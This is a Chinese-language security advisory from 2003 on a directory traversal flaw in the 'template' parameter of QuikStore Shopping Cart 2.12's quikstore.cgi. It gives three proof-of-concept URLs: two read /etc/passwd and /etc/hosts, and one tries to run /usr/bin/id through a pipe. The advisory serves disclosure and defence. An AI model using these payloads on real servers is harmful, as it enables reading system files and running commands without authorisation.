发布日期：2003-12-23
更新日期：2003-12-30

受影响系统：

iSoft-Solutions QuikStore Shopping Cart 2.12

描述：

---

BUGTRAQ  ID: 9283

iSoft-Solutions QuikStore Shopping Cart是一款在线电子购物程序。

iSoft-Solutions QuikStore Shopping Cart对用户提交的URI参数缺少充分过滤，远程攻击者可以利用这个漏洞以WEB进程权限在系统上查看任意文件内容。

问题存在于'quikstore.cgi'脚本中，由于对'template'参数缺少充分过滤，攻击者提交使用'../'字符的数据，可以绕过WEB ROOT限制，以WEB进程权限在系统上查看任意文件内容。

<*来源：Dr Ponidi Haryanto （drponidi@hackermail.com）
  *>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

Dr Ponidi Haryanto （drponidi@hackermail.com）提供了如下测试方法：

http://www.example.com/quikstore.cgi?category=blah&template=../../../../../../../../../../etc/passwd%00.html
http://www.example.com/quikstore.cgi?category=blah&template=../../../../../../../../../../../../etc/hosts
http://www.example.com/quikstore.cgi?category=blah&template=../../../../../../../../../../../../usr/bin/id|

建议：

---

厂商补丁：

iSoft-Solutions
---------------
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://www.quikstore.com/

浏览次数：2808
严重程度：0（网友投票）